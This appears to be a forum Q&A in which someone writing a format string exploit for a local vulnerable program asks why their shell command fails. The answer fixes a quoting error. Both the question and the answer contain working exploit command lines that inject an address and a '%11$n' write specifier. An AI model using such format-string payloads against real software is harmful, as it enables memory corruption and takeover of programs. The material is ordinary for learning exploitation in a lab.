I'm writing an format string exploit script for a vulnerable program.
I'm able to exploit the vulnerability by executing the program with the following input:
./vulnerable `perl -e 'print "\x11\x11\x11\x40\x99\x04\x08"'`'AAAAx%11$n'
Here \x40\x99\x04\x08 is the address of a variable in vulnerable.
I want to write a script that generates this input without a hard-coded address.
In my script I retrieve the address of the variable and store it in address.txt.
Then I try to call vulnerable from my script as I did before, but with the content of address.txt:
./vulnerable $(perl -e 'print "\x11\x11\x11$(<address.txt)"')'AAAAx%11$n’
The content of address.txt is \x40\x99\x04\x08 so there is something wrong with the way I provide the content of address.txt to the perl print statement.
I've also tried leave out the $() around perl:
./vulnerable `perl -e 'print "\x11\x11\x11$(<address.txt)"'`'AAAAx%11$n'
But this renders the same result.
What am I doing wrong?
Single quotes don't expand $(...).
./vulnerable $(perl -e 'print "\x11\x11\x11'$(<address.txt)'"')'AAAAx%11$n'
# <------------->
# <-------------------> <->
# <------------------------------------------------><---------->